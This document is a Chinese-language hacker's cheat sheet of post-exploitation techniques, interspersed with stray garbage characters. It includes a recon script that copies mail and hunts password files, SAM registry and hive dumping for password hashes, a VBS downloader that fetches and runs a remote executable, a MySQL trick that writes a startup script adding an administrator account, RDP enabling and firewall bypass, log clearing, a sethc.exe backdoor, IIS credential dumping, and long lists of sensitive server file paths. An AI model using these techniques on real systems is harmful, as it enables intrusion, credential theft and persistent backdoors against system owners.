# f2 [" c  l5 v" H————————————————————————————
! E( s' X$ J( P$ {+ q  c1、tar打包            tar -cvf /home/public_html/*.tar /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
6 p; Q6 [0 B. E3 e. U2 c0 g% A9 T, ^5 Balzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar
: I8 f* o# k9 x( U' T$ O{
  J8 [5 u0 P" [8 D3 _注：
  a8 N" T& V7 L( {6 A9 V& g关于tar的打包方式,linux不以扩展名来决定文件类型。
$ s0 _& v5 I9 F若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压
那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
- v) b2 e( I) p1 w9 F9 S$ e5 d}  
3 P, G' Y3 F# J: p$ O: x+ p
提权先执行systeminfo
& o1 V/ m& [1 J- Y) ]- h$ t0 ], R& j3 _token 漏洞补丁号 KB956572
* h4 v2 g7 J  d# q% A( {* r6 IChurrasco          kb952004
; c4 _7 f2 p, F) u2 L8 c命令行RAR打包~~·
rar a -k -r -s -m3 c:\1.rar c:\folder
——————————————
$ ~: |/ t: ~# o2 {3 w2、收集系统信息的脚本  
" u0 t  t* t( J1 E1 _, |: Z3 ofor window：
! S' v* `! g: ?: a) z2 c
@echo off
echo #########system info collection
5 s( y$ [% l4 A! @, u0 osysteminfo
& O) |# d6 }! h+ Z: nver
hostname
) M6 P4 a2 a8 p) fnet user
net localgroup
8 B& @* x  ~; `6 unet localgroup administrators
net user guest
net user administrator
- a' k& @# T" x* V" q
echo #######at- with   atq#####
echo schtask /query
( B0 a- x4 K1 S+ [! E$ T7 N
  J( N. r: W1 w: d; Eecho
echo ####task-list#############
& \0 M! Z2 _7 Z9 B  wtasklist /svc
3 }6 a/ M6 ~* H4 m1 ^5 f/ _7 b6 G! eecho
echo ####net-work infomation
ipconfig/all
+ {8 d) |7 ~( K4 i1 [; M; b" m, F8 jroute print
% ?% a, r; U2 @- R4 Narp -a
8 X/ a; p; q. x, p9 e" }netstat -anipconfig /displaydns
echo
echo #######service############
/ c% e5 [/ j+ R1 g0 U7 l% _sc query type= service state= all
echo #######file-##############
cd \
tree -F
, |. E- _' v2 n3 [for linux：
8 y; _( z5 h" V+ f
& {+ T2 }9 K7 n#!/bin/bash

echo #######geting sysinfo####
echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
' t+ W5 D3 G" K! fecho #######basic infomation##
cat /proc/meminfo
echo
cat /proc/cpuinfo
echo
' g( h6 B+ u4 ?3 J0 }2 y; Drpm -qa 2>/dev/null
$ Z1 O  X) j$ ^1 k######stole the mail......######
. ]& q- q* J1 G" |. f! Mcp -a /var/mail /tmp/getmail 2>/dev/null

9 f/ U. |- W6 e- U
! u' d# s4 B. @) b9 hecho 'u'r id is' `id`
* j4 d% N) c+ X0 W6 Yecho ###atq&crontab#####
% a1 W+ V6 V. J% {$ latq
7 @6 b5 t! Z: i* @4 Pcrontab -l
echo #####about var#####
: v+ O3 i  c# fset
! X7 @) o) o  R& P! B/ f' ?0 x
echo #####about network###
####this is then point in pentest,but i am a new bird,so u need to add some in it
cat /etc/hosts
hostname
ipconfig -a
  }8 ]  ]3 q, x3 ]arp -v
echo ########user####
" |* I- v' R2 J( I1 Xcat /etc/passwd|grep -i sh

echo ######service####
0 P6 g* P  d. v& I- b/ }# {% Ychkconfig --list

for i in {oracle,mysql,tomcat,samba,apache,ftp}
/ G0 u0 c' z. K' R! r0 n! w3 `+ wcat /etc/passwd|grep -i $i
- O7 M. T- }* Bdone
: R$ Y# T( X& }- R
" b! A9 B- H* G/ |# t0 Qlocate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
) A/ i% h8 z7 U- Q0 l4 qsleep 5
locate conf >/tmp/sysconfig 2>dev/null
7 z! ]) x1 s6 o* u* e; S! W6 W7 |sleep 5
$ {# X" B4 [) y% i5 slocate config >>/tmp/sysconfig 2>/dev/null
. G9 O/ \8 Q) s$ m: W. lsleep 5

###maybe can use "tree /"###
. Q* ?% U/ V! }" @echo ##packing up#########
+ n! t% h) n& @  u3 ptar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
# o+ t/ ^+ M  C9 O) ?rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
——————————————
' R, V& U1 }1 [9 N' ^3、ethash 不免杀怎么获取本机hash。
2 b+ P# {7 B/ o* Z: @9 \8 _首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"   （2000）
- k2 ]/ y1 |2 [! ^8 E: L               reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg  （2003）
1 `' m! ^8 t8 _# b% R7 E; `  z! B注意权限问题，一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问（界面登录的需要注意，system权限可以忽略）
接下来就简单了，把导出的注册表，down 到本机，修改注册表头导入本机，然后用抓去hash的工具抓本地用户就OK了
hash 抓完了记得把自己的账户密码改过来哦！
# O  e' Q+ d% V0 X据我所知，某人是用这个方法虚拟机多次因为不知道密码而进不去！~
——————————————
4、vbs 下载者
5 }1 T% F, L& ]1 \) d; a+ u2 I1
. O1 `8 y  C4 X" Fecho Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
: z! @0 S4 H. oecho sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
  _( s& X) ~& K" m, k' G/ K, oecho sGet.Open() >>c:\windows\cftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
. E8 n, n2 P! V, J- B6 Xecho sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs

2
  O3 j% I" t6 m5 s4 Y9 C9 b/ lOn Error Resume Nextim iRemote,iLocal,s1,s2
6 _7 v4 }4 y  R0 I- ziLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))  
& @0 `8 @0 b/ T0 G+ Bs1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2

cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe

当GetHashes获取不到hash时，可以用兵刃把sam复制到桌面
+ Y. H! Q) f4 b3 v——————————————————
& F1 k% M0 l5 N  F! N( A5、
' c6 L: n0 p+ g7 t1 H3 E7 \1.查询终端端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2.开启XP&2003终端服务
3 E, U0 Q- L' C# c" [/ B# p) }% uREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# r2 b& ~: g4 n% z" \5 w; k3.更改终端端口为2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
/ @* X6 K! p' Z. t' N2 XREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
; Y+ z1 k% a6 {" i6 p, X3 B# kREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled   xpsp2res.dll,-22009 /f
————————————————
6、create table a (cmd text);
: z( Y) F+ @; P6 _: k8 X: r9 Hinsert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
# u, }$ K0 M! r+ E% Finsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");  
& p. T) _  p: Yselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
4 z3 O# ~. ]: a! t, G3 ?3 F; P————————————————————
: t. t' z, P1 k7、BS马的PortMap功能，类似LCX做转发。若果支持ASPX，用这个转发会隐蔽点。（注：一直忽略了在偏僻角落的那个功能）
$ L; E- L8 E8 T5 q7 ?( x_____
8、for /d %i in (d:\freehost\*) do @echo %i
; j8 @9 N  _/ y% s0 P- r
列出d的所有目录
  
  for /d %i in (???) do @echo %i

把当前路径下文件夹的名字只有1-3个字母的打出来

+ |7 h& Y* g6 [2 ~( n2.for /r %i in (*.exe) do @echo %i
' Y  w+ q# m+ w2 j+ \  
以当前目录为搜索路径.会把目录与下面的子目录的全部EXE文件列出

2 E/ o5 H' D" G! M6 Efor /r f:\freehost\hmadesign\web\ %i in (*.*) do @echo %i

3.for /f %i in (c:\1.txt) do echo %i
  ]/ U, G3 J5 ]: z9 e  
  //这个会显示a.txt里面的内容，因为/f的作用，会读出a.txt中

4.for /f "tokens=2 delims= " %i in (a.txt) do echo %i

: R" F1 H# b- d0 X6 c  delims=后的空格是分隔符 tokens是取第几个位置
3 ~  f* K% B* T/ \. G——————————
●注册表:
1.Administrator注册表备份:
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg
+ g* I2 s5 B, C! l
, A, Q8 X9 [' i5 f' ~) i2 s2 h* ^2.修改3389的默认端口:
6 X5 a4 D$ ^& D$ y- n0 b7 t8 rHKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
修改PortNumber.

3.清除3389登录记录:
$ T: z! H+ p8 Nreg delete "HKCU\Software\Microsoft\Terminal Server Client"  /f
& m  {3 e7 z  D
4.Radmin密码:
reg export HKLM\SYSTEM\RAdmin c:\a.reg

5.禁用TCP/IP端口筛选(需重启):
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

6.IPSec默认免除项88端口(需重启):
( T# _. a" T  _; R4 Areg add HKLM\SYSTEM\CurrentControlSet\Services\IPSEC /v NoDefaultExempt /t REG_DWORD /d 0 /f
) ]+ c6 w. K5 r6 |. z: w" Q. W" X或者
4 \: F) ~6 Z# P+ c. U. ^$ `. Knetsh ipsec dynamic set config ipsecexempt value=0

" h7 G4 {7 Z% A- a+ G% w1 n6 D7.停止指派策略"myipsec":
netsh ipsec static set policy name="myipsec" assign=n

) F0 t! C) l" r6 u. J: h8.系统口令恢复LM加密:
; o+ l$ S, m: [" S1 Kreg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LMCompatibilityLevel /t REG_DWORD /d 0 /f
, ^% Q, \: Z# {1 Q, o& C
9.另类方法抓系统密码HASH
reg save hklm\sam c:\sam.hive
  N0 x9 f: A( d1 T" O# ^! K# Z2 qreg save hklm\system c:\system.hive
reg save hklm\security c:\security.hive
8 P& B9 S6 q) I& w# y- d
$ f5 O. N8 H( r. w1 ?% @10.shift映像劫持
  @) P/ e4 g, hreg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d cmd.exe
7 S$ S/ u) T+ c' o3 i0 y
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
-----------------------------------
星外vbs(注：测试通过，好东西）
7 O# ~3 C3 p7 h& u7 N" i1 wSet ObjService=GetObject("IIS://LocalHost/W3SVC")
- L& l4 M( ^1 g6 U" W7 pFor Each obj3w In objservice
childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"")
if IsNumeric(childObjectName)=true then
. f. S$ z* q+ V, ^7 Jset IIs=objservice.GetObject("IIsWebServer",childObjectName)
) a. |4 ?  V! u: p% w0 t" N1 m, Dif err.number<>0 then
* R% ~, o7 x; v) I9 I7 F- zexit for
- K- i& c" U  O4 H3 r. i0 Pmsgbox("error!")
( L+ A% _% M$ o8 Nwscript.quit
end if
serverbindings=IIS.serverBindings
ServerComment=iis.servercomment
set IISweb=iis.getobject("IIsWebVirtualDir","Root")
user=iisweb.AnonymousUserName
' P- B" W% B2 Y$ ~# f( W, U% ipass=iisweb.AnonymousUserPass
path=IIsWeb.path
list=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf
. j( N' G: e$ m2 xend if
1 E: d6 D4 g! C4 |+ X* CNext
9 l5 V+ `- i7 g0 Rwscript.echo list
+ k  C  e+ p% s0 L1 k9 sSet ObjService=Nothing
" B; w  L0 P& m, n5 jwscript.echo "from : http://www.xxx.com/" &vbTab&vbCrLf
7 ~; y9 O( g/ }/ yWScript.Quit
; a8 _: p- `! c复制代码
----------------------2011新气象，欢迎各位补充、指正、优化。----------------
# x5 @8 M. G, G6 ?* O1、Firefox的利用(主要用于内网渗透），火狐浏览器的密码储存在C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\文件夹，打包后，本地查看。或有很多惊喜~
2、win2k的htt提权（注：仅适合2k以及以下版本，文件夹不限,只读权限即可)
$ |; n/ z# R1 @' n* \! v) H将folder.htt文件，加入以下代码：
<OBJECT ID=RUNIT WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="cmd.exe">
8 C, Z6 s; I- y( w) B+ o4 J</OBJECT>
复制代码
然后与desktop.ini、cmd.exe同一个文件夹。当管理打开该文件夹时即可运行。
PS：我N年前在邪八讨论过XP下htt提权，由于N年前happy蠕虫的缘故，2K以后都没有folder.htt文件，但是xp下的htt自运行各位大牛给个力~
1 G2 X0 ?6 C9 k& Wasp代码，利用的时候会出现登录问题
2 [4 `' j8 y+ g  y+ e 原因是ASP大马里有这样的代码：（没有就没事儿了）
2 h- k5 m% u; \) c, f4 P( f5 `0 Y url=request.severvariables("url")
. F( _! }# s) ]: d8 ]) _7 V& q! w  J 这里显示接收到的参数是通过URL来传递的，也就是说登录大马的时候服务器会解析b.asp，于是就出现了问题。
解决方法
, q- B8 ?  |* a) W$ M$ M url=request.severvariables("path_info")
path_info可以直接呈现虚拟路径 顺利解析gif大马
3 y( j+ ^% L( ~& z
: {, u9 E% o1 }==============================================================
LINUX常见路径：
% L" p. P  D! X" s" [
3 ]1 J) r( u. v/etc/passwd
3 P7 y. @# G7 C; X6 F2 }/ J. Y/etc/shadow
; h2 H! H. Y( A; T/ X* G& R; R/etc/fstab
" n" |. `+ m; x6 A. d/etc/host.conf
/etc/motd
( ]4 `8 s# b/ p) ~, A/etc/ld.so.conf
/var/www/htdocs/index.php
% ]9 T* S) t; Y- N% g2 C, ~, R, A/var/www/conf/httpd.conf
1 c( B0 r9 ]. z7 C* I. ~/var/www/htdocs/index.html
0 G; ?) F2 ~. H0 W1 z# M/var/httpd/conf/php.ini
6 A  @* @8 w$ K5 `! v/var/httpd/htdocs/index.php
- [1 O. W+ ^5 [6 I! R/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/httpd/conf/php.ini
/var/www/index.html
: l6 D9 }- t1 K3 m# b" _/var/www/index.php
$ Q+ b' i, Y/ t5 C3 \/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
2 a5 q" s8 C7 I6 g$ y/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
+ Z4 N) E" j( E; `# d# W/usr/local/apache2/htdocs/index.php
5 ~5 L. d! I/ z" B% c' a7 P/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
( x  G6 R0 @' R8 [" x6 P/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
( ^( |  [  ?$ y, T( r, z/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
( h" X5 r- B, }: J: b$ {0 R9 f/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/www/conf/httpd.conf
/www/htdocs/index.php
# C6 m  B, J  n$ L6 A, {/www/htdocs/index.html
" U' q0 M9 P4 N8 F8 K* ?  }8 K/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
8 q' S9 ~& t; Q2 O" b  F* j8 P/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
/etc/apache2/apache.conf
9 e3 m% L+ I5 Y. E1 @8 b/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
+ D3 z3 s5 D6 S3 e' O/etc/phpmyadmin/config.inc.php
( c) W* O( ^# Q* g7 e: v. f/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
$ H- F3 ]( _4 J- @) b/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
9 p( B- N% `/ ?- V% D; M/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
& T6 t; b5 Q( Y( ?9 \5 r5 z/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
: S% H6 D; A+ d/ u2 O/var/log/apache/error_log
) @* ~( t/ x8 t% A- R/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
7 \5 ~. B# J* A, k$ P/var/log/apache2/error_log
( I0 i  Q2 q0 {. ~& j# T/var/log/apache2/error.log
) P7 f/ A6 U2 ?/var/log/apache2/access_log
9 a. P2 j. e! e  q' }, v( I/var/log/apache2/access.log
/var/www/logs/error_log
3 L9 T9 T# v" q/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
) `: M! w1 [/ S- z5 ?: ^. V/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
4 R" z/ E5 _2 l  [% a. N/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
; |  h$ a9 o) \  b9 x9 g/var/log/error_log
9 V) [% T# b# L/var/log/error.log
2 [3 ]" C2 @6 G/var/log/access_log
( ], b* {' n; |2 k7 Z0 j/var/log/access.log
/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error_logerror_log.old
/etc/php.ini
0 Q9 k4 v* O, r( e7 v3 U/bin/php.ini
" v) x8 Y7 {7 k+ i% G3 n/etc/init.d/httpd
/etc/init.d/mysql
/etc/httpd/php.ini
  l2 o, h7 @. G$ b1 o: ?! E( L- a/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/etc/php.ini
& J- j) A& [* J: @/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
8 P3 @6 _' ?  e6 ^/usr/local/php4/lib/php.ini
. V. z- C( A! R0 f. e9 Q/usr/local/php4/php.ini
  Q  M8 U1 J- V+ B  l- R" a/ s/usr/local/php4/lib/php.ini
/usr/local/php5/lib/php.ini
* E' g/ c1 |  p6 ?# o! C& g/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
3 P, p2 C! \  f  `" \/usr/local/apache/conf/php.ini
" F* l' r+ n3 H& z. t" H/usr/local/apache/conf/httpd.conf
4 A; {/ P5 _! H' h' [: s  h! X/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
! F1 [7 b6 E  X; i: h/etc/php5/apache2/php.ini
% x; R4 |( _% P! }8 w  E* C5 R7 [/etc/php/php.ini
' ~8 Q2 k- i. `- J& B, i  E/etc/php/php4/php.ini
/etc/php/apache/php.ini
" q6 d: L. x1 W$ R/etc/php/apache2/php.ini
/web/conf/php.ini
/usr/local/Zend/etc/php.ini
( l" n" D' C9 w& z8 K. e1 S5 A/opt/xampp/etc/php.ini
8 ^3 T; ]' O/ N6 d5 a0 c/var/local/www/conf/php.ini
7 A& q7 M! I1 G/var/local/www/conf/httpd.conf
/etc/php/cgi/php.ini
/etc/php4/cgi/php.ini
# ?! f" N6 f( ?- y/etc/php5/cgi/php.ini
. g1 o4 I; B4 b$ S. s6 k/php5/php.ini
/ ?( y2 v( r) D; p/php4/php.ini
: w& D2 Z& K. H5 y% I' U/php/php.ini
/PHP/php.ini
$ f, `* u  r( P7 h- a/apache/php/php.ini
/xampp/apache/bin/php.ini
5 A* t; @/ s& l/ X; w5 d: ?; e/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
+ W+ Q4 }+ O: H. ?9 i0 h  T* y0 y& ^% g/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
1 y* O" P6 ^! y7 N& o9 c7 h8 Z/var/log/mysql.log
3 I6 Y& j: U: z. w9 N  J6 R$ ?1 [- H/var/log/mysqlderror.log
/var/log/mysql/mysql.log
4 K: d7 q) q5 {/var/log/mysql/mysql-slow.log
8 A, @7 ~+ x4 `6 I$ N/var/mysql.log
: U% w/ C0 Y1 e/var/lib/mysql/my.cnf
: }7 W4 s; k/ B9 n/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
/etc/mysql/my.cnf
/etc/my.cnf
. S3 G8 H, `8 U: G+ l7 _/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/share/examples/php4/php.ini
( M5 _8 b. _, [# l9 ^/usr/local/share/examples/php/php.ini
4 O. {. S" S! ~8 |
2..windows常见路径（可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘）
4 e- o% M& ?7 G  h( \
5 c/ S9 F9 m8 ]9 o3 y/ Q; jc:\windows\php.ini
c:\boot.ini
+ c+ V9 C7 r9 D* nc:\1.txt
: H5 P. H/ ?; f" |- p# Dc:\a.txt

1 L) V1 \8 o# l/ n! D, `c:\CMailServer\config.ini
( a7 r1 p: u5 }- v( tc:\CMailServer\CMailServer.exe
2 P. d9 j- h, \3 @c:\CMailServer\WebMail\index.asp
c:\program files\CMailServer\CMailServer.exe
5 \0 g+ ?& X% g5 y0 `& w" _' Bc:\program files\CMailServer\WebMail\index.asp
C:\WinWebMail\SysInfo.ini
C:\WinWebMail\Web\default.asp
C:\WINDOWS\FreeHost32.dll
* F/ k4 ~8 T7 i  kC:\WINDOWS\7i24iislog4.exe
C:\WINDOWS\7i24tool.exe

c:\hzhost\databases\url.asp

c:\hzhost\hzclient.exe
$ m! K" j9 r1 sC:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
# F/ A& ~6 z! f! D! }
C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
3 C3 n4 X) O' ^; M+ cC:\WINDOWS\web.config
! Y, k3 z, k8 Nc:\web\index.html
6 w+ a% c  B7 F5 A4 E" uc:\www\index.html
  }- g( X& z% Q) u# d, Bc:\WWWROOT\index.html
c:\website\index.html
c:\web\index.asp
c:\www\index.asp
c:\wwwsite\index.asp
c:\WWWROOT\index.asp
  Q: X4 v, @0 @7 N! R! B3 Xc:\web\index.php
$ n0 r. _+ T* L. ]1 i  Ac:\www\index.php
* J* F. u! [# {  }c:\WWWROOT\index.php
c:\WWWsite\index.php
c:\web\default.html
c:\www\default.html
/ d  j" ^; D- N. ^2 ]c:\WWWROOT\default.html
* u9 R8 X; D6 A% L: I: k+ Uc:\website\default.html
c:\web\default.asp
c:\www\default.asp
: o* k5 p+ A# \4 y" M: bc:\wwwsite\default.asp
: @/ ?+ T% r- C. e+ Ac:\WWWROOT\default.asp
1 E9 g; c( g6 r" J4 m& \c:\web\default.php
c:\www\default.php
9 S: S5 v, j* Vc:\WWWROOT\default.php
c:\WWWsite\default.php
C:\Inetpub\wwwroot\pagerror.gif
c:\windows\notepad.exe
( [$ G( f* J- Y: n, x; V# Yc:\winnt\notepad.exe
  j4 F6 K4 b2 n( a! L- MC:\Program Files\Microsoft Office\OFFICE10\winword.exe
C:\Program Files\Microsoft Office\OFFICE11\winword.exe
- c& ~8 Q8 a8 e6 C+ v4 E, nC:\Program Files\Microsoft Office\OFFICE12\winword.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\winrar\rar.exe
C:\Program Files\360\360Safe\360safe.exe
! B) Y( N' x7 E% S0 I# F6 IC:\Program Files\360Safe\360safe.exe
, l: ^2 G1 S/ U/ l* U4 Z0 F0 ]C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
c:\ravbin\store.ini
  v  M8 n0 Q7 r4 F0 cc:\rising.ini
C:\Program Files\Rising\Rav\RsTask.xml
: Y* k# @! D- z* L, p4 Y+ I/ dC:\Documents and Settings\All Users\Start Menu\desktop.ini
  v( v3 U5 `- v) Q" g' ~+ WC:\Documents and Settings\Administrator\My Documents\Default.rdp
% T/ e7 B! t0 w" @7 dC:\Documents and Settings\Administrator\Cookies\index.dat
% T: @) H) S/ c$ k) A9 b& ^C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
. t$ K, X5 G5 {. m1 j$ G2 pC:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
C:\Documents and Settings\Administrator\My Documents\1.txt
C:\Documents and Settings\Administrator\桌面\1.txt
C:\Documents and Settings\Administrator\My Documents\a.txt
C:\Documents and Settings\Administrator\桌面\a.txt
7 e0 t8 G- V$ U% xC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
, z! g0 G4 M& }* RC:\Program Files\RhinoSoft.com\Serv-U\Version.txt
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Symantec\SYMEVENT.INF
4 @. W0 K- _) qC:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
$ b5 z. }6 ^+ [' c1 AC:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
3 [2 _4 J0 e: T7 e9 K% ~2 VC:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
- Y+ d2 r! i- y$ w: XC:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
1 Q# f% v) R5 \" EC:\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
. Q5 w, M1 M7 n: XC:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
C:\Program Files\MySQL\MySQL Server 5.0\COPYING
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
! Z  x: W5 {) e% K5 f1 ]- RC:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\bin\mysql.exe
6 ~- _# V) X) z5 h2 _# t9 @  v$ uc:\MySQL\MySQL Server 4.1\data\mysql\user.frm
& I( j  l" [6 l8 o0 ~+ E& O* r- G" [C:\Program Files\Oracle\oraconfig\Lpk.dll
% E' y3 M+ W& V2 s' `* DC:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
C:\WINDOWS\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\system32\inetsrv\MetaBase.xml
C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
C:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\sam
: f6 Q0 I& |1 l; |0 y* a! M' Q; E! OC:\WINDOWS\system32\config\system
- e3 y: j, U1 \c:\CMailServer\config.ini
0 d( }9 K0 ?* x) p: z2 g7 N4 V( zc:\program files\CMailServer\config.ini
c:\tomcat6\tomcat6\bin\version.sh
c:\tomcat6\bin\version.sh
c:\tomcat\bin\version.sh
c:\program files\tomcat6\bin\version.sh
C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
" E8 I) N! N- Y8 a" yc:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
, w" a& R9 K/ Z+ Z* K9 Uc:\Apache2\Apache2\bin\Apache.exe
2 R' x, l1 k4 ~2 Rc:\Apache2\bin\Apache.exe
c:\Apache2\php\license.txt
2 u) _% _: v( s7 i0 pC:\Program Files\Apache Group\Apache2\bin\Apache.exe
/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
) V  |( S, O' t* k/usr/tomcat6/bin/startup.sh
' j+ y6 N% X( x; zc:\Program Files\QQ2007\qq.exe
4 R5 }. L1 U" T8 L9 {) Oc:\Program Files\Tencent\qq\User.db
c:\Program Files\Tencent\qq\qq.exe
c:\Program Files\Tencent\qq\bin\qq.exe
c:\Program Files\Tencent\qq2009\qq.exe
9 \7 ^2 @" N- V: p+ vc:\Program Files\Tencent\qq2008\qq.exe
c:\Program Files\Tencent\qq2010\bin\qq.exe
c:\Program Files\Tencent\qq\Users\All Users\Registry.db
C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
